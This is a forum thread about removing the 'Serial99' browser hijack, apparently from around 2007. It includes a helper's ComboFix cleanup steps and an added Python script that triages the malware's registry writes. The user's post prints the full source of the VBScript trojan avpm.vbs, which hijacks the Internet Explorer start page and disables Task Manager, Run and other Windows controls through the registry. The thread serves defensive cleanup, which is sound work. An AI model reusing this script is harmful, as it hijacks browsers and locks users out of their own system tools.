Serial99 hijack

Status
Not open for further replies.

M1245456

Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.

There is this new avpm.vbs file in my C drive, I don't know if I can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):


wscript.echo "Cracking... now! Click here for crack!"
itemtype = "REG_SZ"
mustboot = "www serial99.com"
jobfunc = "CRACKED!"
t = "Successfull!"
Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
Set Kaspersky = WScript.CreateObject("WScript.Shell")
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"



-----------

Rootkit scan didn't find anything
I'm guessing to fix my recent docs etc. I just have to change these?:


[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"=0 (0x0)
"DisableTaskMgr"=0 (0x0)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoViewOnDrive"=0 (0x0)
"NoLogoff"=1
"NoRun"=1
"NoFind"=1
"NoRecentDocsMenu"=1
"NoClose"=1


----------

Also when I ran the AVG anti-spyware my kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.

By the way, before I came to this site I ran DSS (Deckard's System Scanner), which I think is based on ComboFix, so I'm including the log as it shows the HijackThis stuff that was removed, and the stuff ComboFix would have done. (Sorry about this, I know you don't want extra logs.)
 

Attachments

  • ComboFix.txt
    13.3 KB · Views: 8
  • AVG - Report-Scan-20071119-163039.txt
    1.2 KB · Views: 5
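A static triage of the RegWrite calls in a script like the avpm.vbs listing above, as an added example that is not part of the original post: it lists which keys and values the script sets so each can be checked on the machine. The sample lines are copied from the listing; the category labels and function names are this example's own.

```python
import re

# Sample input: five RegWrite lines copied from the avpm.vbs listing in the post.
SAMPLE = r'''
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"
'''

# WScript.Shell RegWrite call: "key\value name", "data" [, "type"]
REGWRITE = re.compile(
    r'\.RegWrite\s+"([^"]+)"\s*,\s*"([^"]*)"\s*(?:,\s*"([^"]*)")?', re.I)

# Category labels are this example's own, matched against the lowercased key path.
RULES = [
    (r'\\policies\\(system|explorer)$', 'shell-lockout'),
    (r'\\policies\\microsoft\\internet explorer\\', 'ie-settings-lock'),
    (r'\\internet explorer\\main$', 'ie-hijack'),
    (r'\\url\\prefixes$', 'url-prefix-hijack'),
    (r'\\explorer\\advanced$', 'explorer-display'),
]

def triage(script_text):
    """Return one record per RegWrite call: key, value name, data, type, category."""
    findings = []
    for path, data, rtype in REGWRITE.findall(script_text):
        key, _, value = path.rpartition('\\')
        key = key.rstrip('\\')  # the listing separates key and value name with "\\"
        category = next((label for pat, label in RULES
                         if re.search(pat, key.lower())), 'other')
        findings.append({'key': key, 'value': value, 'data': data,
                         'type': rtype or 'unspecified', 'category': category})
    return findings

def lockout_values(findings):
    """Value names written under the Policies\\System and Policies\\Explorer keys."""
    return [f['value'] for f in findings if f['category'] == 'shell-lockout']

if __name__ == '__main__':
    for f in triage(SAMPLE):
        print(f"{f['category']:17} {f['key']}  ->  {f['value']} = {f['data']!r} ({f['type']})")
```

Running it over the full script text gives the complete list of values to compare against a registry dump such as the one quoted in the post.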
Open notepad and copy/paste the text in the code box below into it:
NOTE* make sure to only highlight and copy what is inside the quote box, nothing outside of it.
Also ..

Pay particular attention to this :-

Make sure the word File:: is on the first line of the text file you save (no blank line above it, & no space in front of it)
Code:


File::
C:\WINDOWS\iun6002.exe
C:\WINDOWS\Setup1.exe
C:\WINDOWS\ST6UNST.EXE
C:\avpm.vbs
C:\drmHeader.bin
C:\WINDOWS\system32\abcccbbf_s.dll
C:\WINDOWS\system32\gfhkj.bak2

Folder::
C:\VundoFix Backups


Save this as CFScript.txt

Then drag the CFScript.txt into ComboFix.exe as you see in the screenshot below.

CFScript.gif


This will start ComboFix again. After reboot, (in case it asks to reboot), post the contents of Combofix.txt in your next reply together with a fresh HJT log.

Regards Howard :)

This thread is for the use of M1245456 only. Please don't post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
 
That is not a full Combofix log.

You need to run Combofix again and post the resulting log file.

Regards Howard :)

 
Hi, combofix kept freezing on 'creating log', here's the dss scan (it doesn't seem to have created an extra.txt, just a main)
 
Your log file looks fine.

Unless you're still having problems, you should be good to go.

Click start/run and type combofix /u into the run box and hit the enter key. That should delete Combofix and all its folders etc.

Turn off system restore (XP/ME only). See how HERE.

Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


If you have any further virus/spyware problems, please post in this thread.

Regards Howard :)

 